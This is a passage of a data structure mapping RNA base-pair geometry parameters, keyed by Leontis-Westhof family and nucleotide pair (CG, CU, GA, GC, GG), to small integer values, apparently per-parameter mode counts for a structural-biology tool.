"tWW_CG_tips_distance":3, "tWW_CG_C1'-B1-B1pair":1, "tWW_CG_B1-B1pair-C1'pair":2, "tWW_CG_C4'-C1'-B1-B1pair":2, "tWW_CG_B1-B1pair-C1'pair-C4'pair":2, "tWW_CG_alpha_1":2, "tWW_CG_alpha_2":1, "tWW_CG_dB1":1, "tWW_CG_dB2":4,
"cWH_CG_tips_distance":3, "cWH_CG_C1'-B1-B1pair":1, "cWH_CG_B1-B1pair-C1'pair":1, "cWH_CG_C4'-C1'-B1-B1pair":2, "cWH_CG_B1-B1pair-C1'pair-C4'pair":2, "cWH_CG_alpha_1":2, "cWH_CG_alpha_2":1, "cWH_CG_dB1":4, "cWH_CG_dB2":2,
"tWH_CG_tips_distance":4, "tWH_CG_C1'-B1-B1pair":2, "tWH_CG_B1-B1pair-C1'pair":1, "tWH_CG_C4'-C1'-B1-B1pair":2, "tWH_CG_B1-B1pair-C1'pair-C4'pair":3, "tWH_CG_alpha_1":2, "tWH_CG_alpha_2":1, "tWH_CG_dB1":3, "tWH_CG_dB2":2,
"cHW_CG_tips_distance":3, "cHW_CG_C1'-B1-B1pair":2, "cHW_CG_B1-B1pair-C1'pair":2, "cHW_CG_C4'-C1'-B1-B1pair":1, "cHW_CG_B1-B1pair-C1'pair-C4'pair":2, "cHW_CG_alpha_1":1, "cHW_CG_alpha_2":2, "cHW_CG_dB1":2, "cHW_CG_dB2":2,
"tHW_CG_tips_distance":5, "tHW_CG_C1'-B1-B1pair":1, "tHW_CG_B1-B1pair-C1'pair":2, "tHW_CG_C4'-C1'-B1-B1pair":1, "tHW_CG_B1-B1pair-C1'pair-C4'pair":2, "tHW_CG_alpha_1":3, "tHW_CG_alpha_2":2, "tHW_CG_dB1":4, "tHW_CG_dB2":3,
"cWS_CG_tips_distance":2, "cWS_CG_C1'-B1-B1pair":1, "cWS_CG_B1-B1pair-C1'pair":1, "cWS_CG_C4'-C1'-B1-B1pair":2, "cWS_CG_B1-B1pair-C1'pair-C4'pair":1, "cWS_CG_alpha_1":1, "cWS_CG_alpha_2":2, "cWS_CG_dB1":2, "cWS_CG_dB2":3,
"tWS_CG_tips_distance":2, "tWS_CG_C1'-B1-B1pair":3, "tWS_CG_B1-B1pair-C1'pair":1, "tWS_CG_C4'-C1'-B1-B1pair":2, "tWS_CG_B1-B1pair-C1'pair-C4'pair":1, "tWS_CG_alpha_1":2, "tWS_CG_alpha_2":1, "tWS_CG_dB1":2, "tWS_CG_dB2":4,
"cSW_CG_tips_distance":7, "cSW_CG_C1'-B1-B1pair":1, "cSW_CG_B1-B1pair-C1'pair":2, "cSW_CG_C4'-C1'-B1-B1pair":2, "cSW_CG_B1-B1pair-C1'pair-C4'pair":3, "cSW_CG_alpha_1":1, "cSW_CG_alpha_2":2, "cSW_CG_dB1":1, "cSW_CG_dB2":3,
"tSW_CG_tips_distance":4, "tSW_CG_C1'-B1-B1pair":1, "tSW_CG_B1-B1pair-C1'pair":2, "tSW_CG_C4'-C1'-B1-B1pair":3, "tSW_CG_B1-B1pair-C1'pair-C4'pair":2, "tSW_CG_alpha_1":1, "tSW_CG_alpha_2":2, "tSW_CG_dB1":7, "tSW_CG_dB2":2,
"cHH_CG_tips_distance":1, "cHH_CG_C1'-B1-B1pair":1, "cHH_CG_B1-B1pair-C1'pair":2, "cHH_CG_C4'-C1'-B1-B1pair":3, "cHH_CG_B1-B1pair-C1'pair-C4'pair":2, "cHH_CG_alpha_1":1, "cHH_CG_alpha_2":2, "cHH_CG_dB1":4, "cHH_CG_dB2":1,
"tHH_CG_tips_distance":8, "tHH_CG_C1'-B1-B1pair":2, "tHH_CG_B1-B1pair-C1'pair":2, "tHH_CG_C4'-C1'-B1-B1pair":3, "tHH_CG_B1-B1pair-C1'pair-C4'pair":2, "tHH_CG_alpha_1":2, "tHH_CG_alpha_2":3, "tHH_CG_dB1":3, "tHH_CG_dB2":4,
"cSH_CG_tips_distance":5, "cSH_CG_C1'-B1-B1pair":1, "cSH_CG_B1-B1pair-C1'pair":2, "cSH_CG_C4'-C1'-B1-B1pair":2, "cSH_CG_B1-B1pair-C1'pair-C4'pair":2, "cSH_CG_alpha_1":1, "cSH_CG_alpha_2":2, "cSH_CG_dB1":6, "cSH_CG_dB2":4,
"tSH_CG_tips_distance":5, "tSH_CG_C1'-B1-B1pair":1, "tSH_CG_B1-B1pair-C1'pair":2, "tSH_CG_C4'-C1'-B1-B1pair":2, "tSH_CG_B1-B1pair-C1'pair-C4'pair":1, "tSH_CG_alpha_1":1, "tSH_CG_alpha_2":3, "tSH_CG_dB1":2, "tSH_CG_dB2":3,
"cHS_CG_tips_distance":4, "cHS_CG_C1'-B1-B1pair":2, "cHS_CG_B1-B1pair-C1'pair":2, "cHS_CG_C4'-C1'-B1-B1pair":3, "cHS_CG_B1-B1pair-C1'pair-C4'pair":2, "cHS_CG_alpha_1":2, "cHS_CG_alpha_2":3, "cHS_CG_dB1":5, "cHS_CG_dB2":2,
"tHS_CG_tips_distance":4, "tHS_CG_C1'-B1-B1pair":1, "tHS_CG_B1-B1pair-C1'pair":2, "tHS_CG_C4'-C1'-B1-B1pair":3, "tHS_CG_B1-B1pair-C1'pair-C4'pair":1, "tHS_CG_alpha_1":1, "tHS_CG_alpha_2":1, "tHS_CG_dB1":3, "tHS_CG_dB2":2,
"cSS_CG_tips_distance":1, "cSS_CG_C1'-B1-B1pair":2, "cSS_CG_B1-B1pair-C1'pair":1, "cSS_CG_C4'-C1'-B1-B1pair":2, "cSS_CG_B1-B1pair-C1'pair-C4'pair":1, "cSS_CG_alpha_1":1, "cSS_CG_alpha_2":2, "cSS_CG_dB1":3, "cSS_CG_dB2":3,
"tSS_CG_tips_distance":5, "tSS_CG_C1'-B1-B1pair":2, "tSS_CG_B1-B1pair-C1'pair":2, "tSS_CG_C4'-C1'-B1-B1pair":1, "tSS_CG_B1-B1pair-C1'pair-C4'pair":2, "tSS_CG_alpha_1":1, "tSS_CG_alpha_2":2, "tSS_CG_dB1":1, "tSS_CG_dB2":2,
"cWW_CU_tips_distance":4, "cWW_CU_C1'-B1-B1pair":1, "cWW_CU_B1-B1pair-C1'pair":1, "cWW_CU_C4'-C1'-B1-B1pair":2, "cWW_CU_B1-B1pair-C1'pair-C4'pair":2, "cWW_CU_alpha_1":1, "cWW_CU_alpha_2":1, "cWW_CU_dB1":1, "cWW_CU_dB2":1,
"tWW_CU_tips_distance":1, "tWW_CU_C1'-B1-B1pair":2, "tWW_CU_B1-B1pair-C1'pair":2, "tWW_CU_C4'-C1'-B1-B1pair":2, "tWW_CU_B1-B1pair-C1'pair-C4'pair":2, "tWW_CU_alpha_1":1, "tWW_CU_alpha_2":2, "tWW_CU_dB1":2, "tWW_CU_dB2":1,
"cWH_CU_tips_distance":5, "cWH_CU_C1'-B1-B1pair":2, "cWH_CU_B1-B1pair-C1'pair":2, "cWH_CU_C4'-C1'-B1-B1pair":2, "cWH_CU_B1-B1pair-C1'pair-C4'pair":2, "cWH_CU_alpha_1":3, "cWH_CU_alpha_2":2, "cWH_CU_dB1":3, "cWH_CU_dB2":1,
"tWH_CU_tips_distance":1, "tWH_CU_C1'-B1-B1pair":2, "tWH_CU_B1-B1pair-C1'pair":2, "tWH_CU_C4'-C1'-B1-B1pair":3, "tWH_CU_B1-B1pair-C1'pair-C4'pair":2, "tWH_CU_alpha_1":3, "tWH_CU_alpha_2":3, "tWH_CU_dB1":5, "tWH_CU_dB2":2,
"cHW_CU_tips_distance":3, "cHW_CU_C1'-B1-B1pair":2, "cHW_CU_B1-B1pair-C1'pair":2, "cHW_CU_C4'-C1'-B1-B1pair":1, "cHW_CU_B1-B1pair-C1'pair-C4'pair":3, "cHW_CU_alpha_1":2, "cHW_CU_alpha_2":2, "cHW_CU_dB1":1, "cHW_CU_dB2":3,
"tHW_CU_tips_distance":8, "tHW_CU_C1'-B1-B1pair":1, "tHW_CU_B1-B1pair-C1'pair":1, "tHW_CU_C4'-C1'-B1-B1pair":3, "tHW_CU_B1-B1pair-C1'pair-C4'pair":2, "tHW_CU_alpha_1":1, "tHW_CU_alpha_2":2, "tHW_CU_dB1":3, "tHW_CU_dB2":3,
"cWS_CU_tips_distance":4, "cWS_CU_C1'-B1-B1pair":1, "cWS_CU_B1-B1pair-C1'pair":2, "cWS_CU_C4'-C1'-B1-B1pair":3, "cWS_CU_B1-B1pair-C1'pair-C4'pair":2, "cWS_CU_alpha_1":3, "cWS_CU_alpha_2":2, "cWS_CU_dB1":4, "cWS_CU_dB2":2,
"tWS_CU_tips_distance":5, "tWS_CU_C1'-B1-B1pair":3, "tWS_CU_B1-B1pair-C1'pair":1, "tWS_CU_C4'-C1'-B1-B1pair":2, "tWS_CU_B1-B1pair-C1'pair-C4'pair":2, "tWS_CU_alpha_1":2, "tWS_CU_alpha_2":1, "tWS_CU_dB1":3, "tWS_CU_dB2":5,
"cSW_CU_tips_distance":3, "cSW_CU_C1'-B1-B1pair":2, "cSW_CU_B1-B1pair-C1'pair":2, "cSW_CU_C4'-C1'-B1-B1pair":2, "cSW_CU_B1-B1pair-C1'pair-C4'pair":3, "cSW_CU_alpha_1":3, "cSW_CU_alpha_2":3, "cSW_CU_dB1":2, "cSW_CU_dB2":4,
"tSW_CU_tips_distance":7, "tSW_CU_C1'-B1-B1pair":2, "tSW_CU_B1-B1pair-C1'pair":2, "tSW_CU_C4'-C1'-B1-B1pair":2, "tSW_CU_B1-B1pair-C1'pair-C4'pair":2, "tSW_CU_alpha_1":2, "tSW_CU_alpha_2":2, "tSW_CU_dB1":2, "tSW_CU_dB2":2,
"cHH_CU_tips_distance":6, "cHH_CU_C1'-B1-B1pair":2, "cHH_CU_B1-B1pair-C1'pair":1, "cHH_CU_C4'-C1'-B1-B1pair":2, "cHH_CU_B1-B1pair-C1'pair-C4'pair":3, "cHH_CU_alpha_1":1, "cHH_CU_alpha_2":1, "cHH_CU_dB1":2, "cHH_CU_dB2":4,
"tHH_CU_tips_distance":5, "tHH_CU_C1'-B1-B1pair":3, "tHH_CU_B1-B1pair-C1'pair":2, "tHH_CU_C4'-C1'-B1-B1pair":2, "tHH_CU_B1-B1pair-C1'pair-C4'pair":1, "tHH_CU_alpha_1":2, "tHH_CU_alpha_2":2, "tHH_CU_dB1":2, "tHH_CU_dB2":2,
"cSH_CU_tips_distance":5, "cSH_CU_C1'-B1-B1pair":2, "cSH_CU_B1-B1pair-C1'pair":2, "cSH_CU_C4'-C1'-B1-B1pair":2, "cSH_CU_B1-B1pair-C1'pair-C4'pair":1, "cSH_CU_alpha_1":1, "cSH_CU_alpha_2":1, "cSH_CU_dB1":4, "cSH_CU_dB2":2,
"tSH_CU_tips_distance":5, "tSH_CU_C1'-B1-B1pair":2, "tSH_CU_B1-B1pair-C1'pair":3, "tSH_CU_C4'-C1'-B1-B1pair":2, "tSH_CU_B1-B1pair-C1'pair-C4'pair":2, "tSH_CU_alpha_1":3, "tSH_CU_alpha_2":3, "tSH_CU_dB1":4, "tSH_CU_dB2":2,
"cHS_CU_tips_distance":2, "cHS_CU_C1'-B1-B1pair":1, "cHS_CU_B1-B1pair-C1'pair":2, "cHS_CU_C4'-C1'-B1-B1pair":2, "cHS_CU_B1-B1pair-C1'pair-C4'pair":2, "cHS_CU_alpha_1":1, "cHS_CU_alpha_2":2, "cHS_CU_dB1":2, "cHS_CU_dB2":4,
"tHS_CU_tips_distance":8, "tHS_CU_C1'-B1-B1pair":2, "tHS_CU_B1-B1pair-C1'pair":1, "tHS_CU_C4'-C1'-B1-B1pair":2, "tHS_CU_B1-B1pair-C1'pair-C4'pair":2, "tHS_CU_alpha_1":2, "tHS_CU_alpha_2":2, "tHS_CU_dB1":3, "tHS_CU_dB2":4,
"cSS_CU_tips_distance":5, "cSS_CU_C1'-B1-B1pair":2, "cSS_CU_B1-B1pair-C1'pair":2, "cSS_CU_C4'-C1'-B1-B1pair":1, "cSS_CU_B1-B1pair-C1'pair-C4'pair":1, "cSS_CU_alpha_1":2, "cSS_CU_alpha_2":3, "cSS_CU_dB1":6, "cSS_CU_dB2":1,
"tSS_CU_tips_distance":5, "tSS_CU_C1'-B1-B1pair":2, "tSS_CU_B1-B1pair-C1'pair":3, "tSS_CU_C4'-C1'-B1-B1pair":2, "tSS_CU_B1-B1pair-C1'pair-C4'pair":2, "tSS_CU_alpha_1":3, "tSS_CU_alpha_2":3, "tSS_CU_dB1":7, "tSS_CU_dB2":2,
"cWW_GA_tips_distance":5, "cWW_GA_C1'-B1-B1pair":1, "cWW_GA_B1-B1pair-C1'pair":1, "cWW_GA_C4'-C1'-B1-B1pair":2, "cWW_GA_B1-B1pair-C1'pair-C4'pair":2, "cWW_GA_alpha_1":1, "cWW_GA_alpha_2":1, "cWW_GA_dB1":2, "cWW_GA_dB2":1,
"tWW_GA_tips_distance":6, "tWW_GA_C1'-B1-B1pair":1, "tWW_GA_B1-B1pair-C1'pair":1, "tWW_GA_C4'-C1'-B1-B1pair":1, "tWW_GA_B1-B1pair-C1'pair-C4'pair":2, "tWW_GA_alpha_1":2, "tWW_GA_alpha_2":2, "tWW_GA_dB1":1, "tWW_GA_dB2":2,
"cWH_GA_tips_distance":2, "cWH_GA_C1'-B1-B1pair":1, "cWH_GA_B1-B1pair-C1'pair":1, "cWH_GA_C4'-C1'-B1-B1pair":3, "cWH_GA_B1-B1pair-C1'pair-C4'pair":2, "cWH_GA_alpha_1":2, "cWH_GA_alpha_2":1, "cWH_GA_dB1":2, "cWH_GA_dB2":2,
"tWH_GA_tips_distance":7, "tWH_GA_C1'-B1-B1pair":1, "tWH_GA_B1-B1pair-C1'pair":2, "tWH_GA_C4'-C1'-B1-B1pair":1, "tWH_GA_B1-B1pair-C1'pair-C4'pair":2, "tWH_GA_alpha_1":2, "tWH_GA_alpha_2":2, "tWH_GA_dB1":1, "tWH_GA_dB2":6,
"cHW_GA_tips_distance":4, "cHW_GA_C1'-B1-B1pair":2, "cHW_GA_B1-B1pair-C1'pair":2, "cHW_GA_C4'-C1'-B1-B1pair":2, "cHW_GA_B1-B1pair-C1'pair-C4'pair":3, "cHW_GA_alpha_1":1, "cHW_GA_alpha_2":2, "cHW_GA_dB1":1, "cHW_GA_dB2":4,
"tHW_GA_tips_distance":3, "tHW_GA_C1'-B1-B1pair":2, "tHW_GA_B1-B1pair-C1'pair":1, "tHW_GA_C4'-C1'-B1-B1pair":2, "tHW_GA_B1-B1pair-C1'pair-C4'pair":2, "tHW_GA_alpha_1":1, "tHW_GA_alpha_2":2, "tHW_GA_dB1":3, "tHW_GA_dB2":1,
"cWS_GA_tips_distance":6, "cWS_GA_C1'-B1-B1pair":3, "cWS_GA_B1-B1pair-C1'pair":2, "cWS_GA_C4'-C1'-B1-B1pair":2, "cWS_GA_B1-B1pair-C1'pair-C4'pair":1, "cWS_GA_alpha_1":2, "cWS_GA_alpha_2":3, "cWS_GA_dB1":3, "cWS_GA_dB2":4,
"tWS_GA_tips_distance":5, "tWS_GA_C1'-B1-B1pair":3, "tWS_GA_B1-B1pair-C1'pair":2, "tWS_GA_C4'-C1'-B1-B1pair":1, "tWS_GA_B1-B1pair-C1'pair-C4'pair":1, "tWS_GA_alpha_1":2, "tWS_GA_alpha_2":2, "tWS_GA_dB1":2, "tWS_GA_dB2":5,
"cSW_GA_tips_distance":4, "cSW_GA_C1'-B1-B1pair":1, "cSW_GA_B1-B1pair-C1'pair":1, "cSW_GA_C4'-C1'-B1-B1pair":1, "cSW_GA_B1-B1pair-C1'pair-C4'pair":1, "cSW_GA_alpha_1":1, "cSW_GA_alpha_2":2, "cSW_GA_dB1":1, "cSW_GA_dB2":2,
"tSW_GA_tips_distance":2, "tSW_GA_C1'-B1-B1pair":1, "tSW_GA_B1-B1pair-C1'pair":2, "tSW_GA_C4'-C1'-B1-B1pair":1, "tSW_GA_B1-B1pair-C1'pair-C4'pair":2, "tSW_GA_alpha_1":1, "tSW_GA_alpha_2":3, "tSW_GA_dB1":2, "tSW_GA_dB2":2,
"cHH_GA_tips_distance":3, "cHH_GA_C1'-B1-B1pair":2, "cHH_GA_B1-B1pair-C1'pair":2, "cHH_GA_C4'-C1'-B1-B1pair":2, "cHH_GA_B1-B1pair-C1'pair-C4'pair":2, "cHH_GA_alpha_1":2, "cHH_GA_alpha_2":3, "cHH_GA_dB1":2, "cHH_GA_dB2":3,
"tHH_GA_tips_distance":3, "tHH_GA_C1'-B1-B1pair":3, "tHH_GA_B1-B1pair-C1'pair":2, "tHH_GA_C4'-C1'-B1-B1pair":2, "tHH_GA_B1-B1pair-C1'pair-C4'pair":2, "tHH_GA_alpha_1":1, "tHH_GA_alpha_2":2, "tHH_GA_dB1":3, "tHH_GA_dB2":2,
"cSH_GA_tips_distance":1, "cSH_GA_C1'-B1-B1pair":2, "cSH_GA_B1-B1pair-C1'pair":2, "cSH_GA_C4'-C1'-B1-B1pair":2, "cSH_GA_B1-B1pair-C1'pair-C4'pair":2, "cSH_GA_alpha_1":1, "cSH_GA_alpha_2":2, "cSH_GA_dB1":2, "cSH_GA_dB2":1,
"tSH_GA_tips_distance":3, "tSH_GA_C1'-B1-B1pair":1, "tSH_GA_B1-B1pair-C1'pair":1, "tSH_GA_C4'-C1'-B1-B1pair":2, "tSH_GA_B1-B1pair-C1'pair-C4'pair":2, "tSH_GA_alpha_1":2, "tSH_GA_alpha_2":2, "tSH_GA_dB1":2, "tSH_GA_dB2":7,
"cHS_GA_tips_distance":5, "cHS_GA_C1'-B1-B1pair":3, "cHS_GA_B1-B1pair-C1'pair":3, "cHS_GA_C4'-C1'-B1-B1pair":3, "cHS_GA_B1-B1pair-C1'pair-C4'pair":2, "cHS_GA_alpha_1":2, "cHS_GA_alpha_2":2, "cHS_GA_dB1":3, "cHS_GA_dB2":4,
"tHS_GA_tips_distance":5, "tHS_GA_C1'-B1-B1pair":3, "tHS_GA_B1-B1pair-C1'pair":1, "tHS_GA_C4'-C1'-B1-B1pair":3, "tHS_GA_B1-B1pair-C1'pair-C4'pair":2, "tHS_GA_alpha_1":2, "tHS_GA_alpha_2":1, "tHS_GA_dB1":1, "tHS_GA_dB2":2,
"cSS_GA_tips_distance":4, "cSS_GA_C1'-B1-B1pair":3, "cSS_GA_B1-B1pair-C1'pair":2, "cSS_GA_C4'-C1'-B1-B1pair":1, "cSS_GA_B1-B1pair-C1'pair-C4'pair":1, "cSS_GA_alpha_1":2, "cSS_GA_alpha_2":1, "cSS_GA_dB1":1, "cSS_GA_dB2":1,
"tSS_GA_tips_distance":4, "tSS_GA_C1'-B1-B1pair":1, "tSS_GA_B1-B1pair-C1'pair":1, "tSS_GA_C4'-C1'-B1-B1pair":1, "tSS_GA_B1-B1pair-C1'pair-C4'pair":1, "tSS_GA_alpha_1":1, "tSS_GA_alpha_2":2, "tSS_GA_dB1":5, "tSS_GA_dB2":2,
"cWW_GC_tips_distance":5, "cWW_GC_C1'-B1-B1pair":1, "cWW_GC_B1-B1pair-C1'pair":2, "cWW_GC_C4'-C1'-B1-B1pair":2, "cWW_GC_B1-B1pair-C1'pair-C4'pair":2, "cWW_GC_alpha_1":2, "cWW_GC_alpha_2":1, "cWW_GC_dB1":2, "cWW_GC_dB2":3,
"tWW_GC_tips_distance":3, "tWW_GC_C1'-B1-B1pair":1, "tWW_GC_B1-B1pair-C1'pair":2, "tWW_GC_C4'-C1'-B1-B1pair":2, "tWW_GC_B1-B1pair-C1'pair-C4'pair":2, "tWW_GC_alpha_1":1, "tWW_GC_alpha_2":2, "tWW_GC_dB1":3, "tWW_GC_dB2":4,
"cWH_GC_tips_distance":7, "cWH_GC_C1'-B1-B1pair":2, "cWH_GC_B1-B1pair-C1'pair":2, "cWH_GC_C4'-C1'-B1-B1pair":2, "cWH_GC_B1-B1pair-C1'pair-C4'pair":1, "cWH_GC_alpha_1":2, "cWH_GC_alpha_2":2, "cWH_GC_dB1":2, "cWH_GC_dB2":3,
"tWH_GC_tips_distance":5, "tWH_GC_C1'-B1-B1pair":1, "tWH_GC_B1-B1pair-C1'pair":1, "tWH_GC_C4'-C1'-B1-B1pair":2, "tWH_GC_B1-B1pair-C1'pair-C4'pair":2, "tWH_GC_alpha_1":3, "tWH_GC_alpha_2":3, "tWH_GC_dB1":2, "tWH_GC_dB2":2,
"cHW_GC_tips_distance":4, "cHW_GC_C1'-B1-B1pair":1, "cHW_GC_B1-B1pair-C1'pair":1, "cHW_GC_C4'-C1'-B1-B1pair":2, "cHW_GC_B1-B1pair-C1'pair-C4'pair":2, "cHW_GC_alpha_1":1, "cHW_GC_alpha_2":1, "cHW_GC_dB1":3, "cHW_GC_dB2":4,
"tHW_GC_tips_distance":5, "tHW_GC_C1'-B1-B1pair":2, "tHW_GC_B1-B1pair-C1'pair":2, "tHW_GC_C4'-C1'-B1-B1pair":2, "tHW_GC_B1-B1pair-C1'pair-C4'pair":2, "tHW_GC_alpha_1":2, "tHW_GC_alpha_2":2, "tHW_GC_dB1":2, "tHW_GC_dB2":4,
"cWS_GC_tips_distance":8, "cWS_GC_C1'-B1-B1pair":1, "cWS_GC_B1-B1pair-C1'pair":1, "cWS_GC_C4'-C1'-B1-B1pair":2, "cWS_GC_B1-B1pair-C1'pair-C4'pair":2, "cWS_GC_alpha_1":2, "cWS_GC_alpha_2":1, "cWS_GC_dB1":2, "cWS_GC_dB2":1,
"tWS_GC_tips_distance":2, "tWS_GC_C1'-B1-B1pair":1, "tWS_GC_B1-B1pair-C1'pair":1, "tWS_GC_C4'-C1'-B1-B1pair":3, "tWS_GC_B1-B1pair-C1'pair-C4'pair":2, "tWS_GC_alpha_1":2, "tWS_GC_alpha_2":1, "tWS_GC_dB1":4, "tWS_GC_dB2":5,
"cSW_GC_tips_distance":4, "cSW_GC_C1'-B1-B1pair":2, "cSW_GC_B1-B1pair-C1'pair":3, "cSW_GC_C4'-C1'-B1-B1pair":1, "cSW_GC_B1-B1pair-C1'pair-C4'pair":2, "cSW_GC_alpha_1":3, "cSW_GC_alpha_2":2, "cSW_GC_dB1":3, "cSW_GC_dB2":2,
"tSW_GC_tips_distance":2, "tSW_GC_C1'-B1-B1pair":1, "tSW_GC_B1-B1pair-C1'pair":3, "tSW_GC_C4'-C1'-B1-B1pair":1, "tSW_GC_B1-B1pair-C1'pair-C4'pair":2, "tSW_GC_alpha_1":2, "tSW_GC_alpha_2":2, "tSW_GC_dB1":4, "tSW_GC_dB2":2,
"cHH_GC_tips_distance":1, "cHH_GC_C1'-B1-B1pair":3, "cHH_GC_B1-B1pair-C1'pair":1, "cHH_GC_C4'-C1'-B1-B1pair":2, "cHH_GC_B1-B1pair-C1'pair-C4'pair":1, "cHH_GC_alpha_1":2, "cHH_GC_alpha_2":2, "cHH_GC_dB1":3, "cHH_GC_dB2":3,
"tHH_GC_tips_distance":8, "tHH_GC_C1'-B1-B1pair":2, "tHH_GC_B1-B1pair-C1'pair":1, "tHH_GC_C4'-C1'-B1-B1pair":2, "tHH_GC_B1-B1pair-C1'pair-C4'pair":2, "tHH_GC_alpha_1":3, "tHH_GC_alpha_2":1, "tHH_GC_dB1":6, "tHH_GC_dB2":3,
"cSH_GC_tips_distance":8, "cSH_GC_C1'-B1-B1pair":2, "cSH_GC_B1-B1pair-C1'pair":3, "cSH_GC_C4'-C1'-B1-B1pair":1, "cSH_GC_B1-B1pair-C1'pair-C4'pair":3, "cSH_GC_alpha_1":2, "cSH_GC_alpha_2":2, "cSH_GC_dB1":5, "cSH_GC_dB2":4,
"tSH_GC_tips_distance":4, "tSH_GC_C1'-B1-B1pair":1, "tSH_GC_B1-B1pair-C1'pair":2, "tSH_GC_C4'-C1'-B1-B1pair":1, "tSH_GC_B1-B1pair-C1'pair-C4'pair":4, "tSH_GC_alpha_1":1, "tSH_GC_alpha_2":2, "tSH_GC_dB1":2, "tSH_GC_dB2":3,
"cHS_GC_tips_distance":5, "cHS_GC_C1'-B1-B1pair":2, "cHS_GC_B1-B1pair-C1'pair":2, "cHS_GC_C4'-C1'-B1-B1pair":2, "cHS_GC_B1-B1pair-C1'pair-C4'pair":2, "cHS_GC_alpha_1":3, "cHS_GC_alpha_2":1, "cHS_GC_dB1":2, "cHS_GC_dB2":5,
"tHS_GC_tips_distance":5, "tHS_GC_C1'-B1-B1pair":2, "tHS_GC_B1-B1pair-C1'pair":2, "tHS_GC_C4'-C1'-B1-B1pair":2, "tHS_GC_B1-B1pair-C1'pair-C4'pair":3, "tHS_GC_alpha_1":2, "tHS_GC_alpha_2":2, "tHS_GC_dB1":2, "tHS_GC_dB2":2,
"cSS_GC_tips_distance":2, "cSS_GC_C1'-B1-B1pair":2, "cSS_GC_B1-B1pair-C1'pair":2, "cSS_GC_C4'-C1'-B1-B1pair":1, "cSS_GC_B1-B1pair-C1'pair-C4'pair":1, "cSS_GC_alpha_1":2, "cSS_GC_alpha_2":3, "cSS_GC_dB1":3, "cSS_GC_dB2":3,
"tSS_GC_tips_distance":5, "tSS_GC_C1'-B1-B1pair":2, "tSS_GC_B1-B1pair-C1'pair":2, "tSS_GC_C4'-C1'-B1-B1pair":1, "tSS_GC_B1-B1pair-C1'pair-C4'pair":2, "tSS_GC_alpha_1":2, "tSS_GC_alpha_2":3, "tSS_GC_dB1":2, "tSS_GC_dB2":1,
"cWW_GG_tips_distance":3, "cWW_GG_C1'-B1-B1pair":1, "cWW_GG_B1-B1pair-C1'pair":1, "cWW_GG_C4'-C1'-B1-B1pair":2, "cWW_GG_B1-B1pair-C1'pair-C4'pair":1, "cWW_GG_alpha_1":1, "cWW_GG_alpha_2":2, "cWW_GG_dB1":2, "cWW_GG_dB2":2,
"tWW_GG_tips_distance":4, "tWW_GG_C1'-B1-B1pair":1, "tWW_GG_B1-B1pair-C1'pair":1, "tWW_GG_C4'-C1'-B1-B1pair":2, "tWW_GG_B1-B1pair-C1'pair-C4'pair":2, "tWW_GG_alpha_1":2, "tWW_GG_alpha_2":2, "tWW_GG_dB1":1, "tWW_GG_dB2":2,
"cWH_GG_tips_distance":2, "cWH_GG_C1'-B1-B1pair":2, "cWH_GG_B1-B1pair-C1'pair":2, "cWH_GG_C4'-C1'-B1-B1pair":2, "cWH_GG_B1-B1pair-C1'pair-C4'pair":2, "cWH_GG_alpha_1":2, "cWH_GG_alpha_2":2, "cWH_GG_dB1":4, "cWH_GG_dB2":3,
"tWH_GG_tips_distance":2, "tWH_GG_C1'-B1-B1pair":1, "tWH_GG_B1-B1pair-C1'pair":2, "tWH_GG_C4'-C1'-B1-B1pair":2, "tWH_GG_B1-B1pair-C1'pair-C4'pair":2, "tWH_GG_alpha_1":2, "tWH_GG_alpha_2":2, "tWH_GG_dB1":2, "tWH_GG_dB2":3,
"cHW_GG_tips_distance":3, "cHW_GG_C1'-B1-B1pair":2, "cHW_GG_B1-B1pair-C1'pair":2, "cHW_GG_C4'-C1'-B1-B1pair":2, "cHW_GG_B1-B1pair-C1'pair-C4'pair":2, "cHW_GG_alpha_1":1, "cHW_GG_alpha_2":1, "cHW_GG_dB1":2, "cHW_GG_dB2":2,
"tHW_GG_tips_distance":4, "tHW_GG_C1'-B1-B1pair":2, "tHW_GG_B1-B1pair-C1'pair":2, "tHW_GG_C4'-C1'-B1-B1pair":1, "tHW_GG_B1-B1pair-C1'pair-C4'pair":2, "tHW_GG_alpha_1":2, "tHW_GG_alpha_2":2, "tHW_GG_dB1":1, "tHW_GG_dB2":4,
"cWS_GG_tips_distance":2, "cWS_GG_C1'-B1-B1pair":1, "cWS_GG_B1-B1pair-C1'pair":1, "cWS_GG_C4'-C1'-B1-B1pair":2, "cWS_GG_B1-B1pair-C1'pair-C4'pair":1, "cWS_GG_alpha_1":2, "cWS_GG_alpha_2":2, "cWS_GG_dB1":4, "cWS_GG_dB2":3,
"tWS_GG_tips_distance":8, "tWS_GG_C1'-B1-B1pair":3, "tWS_GG_B1-B1pair-C1'pair":2, "tWS_GG_C4'-C1'-B1-B1pair":3, "tWS_GG_B1-B1pair-C1'pair-C4'pair":2, "tWS_GG_alpha_1":1, "tWS_GG_alpha_2":1, "tWS_GG_dB1":1, "tWS_GG_dB2":3,
"cSW_GG_tips_distance":1, "cSW_GG_C1'-B1-B1pair":1, "cSW_GG_B1-B1pair-C1'pair":1, "cSW_GG_C4'-C1'-B1-B1pair":1, "cSW_GG_B1-B1pair-C1'pair-C4'pair":2, "cSW_GG_alpha_1":2, "cSW_GG_alpha_2":2, "cSW_GG_dB1":2, "cSW_GG_dB2":2,
"tSW_GG_tips_distance":5, "tSW_GG_C1'-B1-B1pair":3, "tSW_GG_B1-B1pair-C1'pair":2, "tSW_GG_C4'-C1'-B1-B1pair":3, "tSW_GG_B1-B1pair-C1'pair-C4'pair":2, "tSW_GG_alpha_1":1, "tSW_GG_alpha_2":3, "tSW_GG_dB1":2, "tSW_GG_dB2":1,
"cHH_GG_tips_distance":4, "cHH_GG_C1'-B1-B1pair":1, "cHH_GG_B1-B1pair-C1'pair":1, "cHH_GG_C4'-C1'-B1-B1pair":2, "cHH_GG_B1-B1pair-C1'pair-C4'pair":3, "cHH_GG_alpha_1":1, "cHH_GG_alpha_2":2, "cHH_GG_dB1":2, "cHH_GG_dB2":3,
"tHH_GG_tips_distance":8, "tHH_GG_C1'-B1-B1pair":2, "tHH_GG_B1-B1pair-C1'pair":2, "tHH_GG_C4'-C1'-B1-B1pair":2, "tHH_GG_B1-B1pair-C1'pair-C4'pair":3, "tHH_GG_alpha_1":2, "tHH_GG_alpha_2":2, "tHH_GG_dB1":2, "tHH_GG_dB2":3,
